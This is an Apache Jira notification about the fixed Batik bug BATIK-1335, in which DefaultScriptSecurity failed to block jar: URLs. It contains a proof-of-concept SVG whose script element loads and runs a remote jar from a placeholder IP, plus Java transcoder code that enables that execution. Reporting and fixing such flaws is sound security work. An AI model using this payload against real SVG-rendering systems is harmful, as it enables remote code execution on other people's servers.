[
https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Simon Steiner resolved BATIK-1335.
----------------------------------
Fix Version/s: trunk
Resolution: Fixed
http://svn.apache.org/viewvc?view=revision&revision=1903910
> Jar url should be blocked by DefaultScriptSecurity
> --------------------------------------------------
>
> Key: BATIK-1335
> URL: https://issues.apache.org/jira/browse/BATIK-1335
> Project: Batik
> Issue Type: Bug
> Reporter: Simon Steiner
> Assignee: Simon Steiner
> Priority: Major
> Fix For: trunk
>
>
> <svg xmlns="http://www.w3.org/2000/svg";
> xmlns:xlink="http://www.w3.org/1999/xlink"; width="450" height="500"
> viewBox="0 0 450 500">
> <script type="application/java-archive"
> xlink:href="jar:http://192.168.1.10/poc.jar!/";></script>
> </svg>
> should be blocked when using:
> JPEGTranscoder t = new JPEGTranscoder();
> t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
> t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES,
> "application/java-archive,");
> FileInputStream stream = new FileInputStream("test.svg");
> TranscoderInput input = new TranscoderInput(stream);
> FileOutputStream fos = new FileOutputStream("out.jpg");
> TranscoderOutput output = new TranscoderOutput(fos);
> t.transcode(input, output);
> fos.close();
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: batik-dev-unsubscr...@xmlgraphics.apache.org
For additional commands, e-mail: batik-dev-h...@xmlgraphics.apache.org
